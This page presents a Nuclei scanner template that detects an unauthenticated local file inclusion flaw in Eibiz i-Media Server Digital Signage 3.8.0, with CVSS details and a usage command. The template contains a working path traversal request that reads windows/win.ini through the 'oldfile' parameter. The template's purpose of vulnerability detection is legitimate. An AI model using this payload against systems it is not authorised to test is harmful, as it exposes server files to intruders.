Skip to content

Eibiz i-Media Server Digital Signage 3.8.0 - Local File Inclusion

ID: eibiz-lfi

Severity: high

Author: 0x_akoko

Tags: lfi,eibiz,packetstorm,windows

Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server’s root directory. The issue can be triggered through the oldfile GET parameter.

id: eibiz-lfi
info:
name: Eibiz i-Media Server Digital Signage 3.8.0 - Local File Inclusion
author: 0x_akoko
severity: high
description: Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
reference:
- https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: lfi,eibiz,packetstorm,windows
http:
- method: GET
path:
- "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# digest: 490a0046304402200a73eff089d15c7d3ec4cb491ef9a3e01772f790abf713e4ee6d37de2a909f63022003f0a568024ca977d46c1fd95ce92c584619449613c7ad80f56e49ac7884147d:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/eibiz-lfi.yaml"

View on Github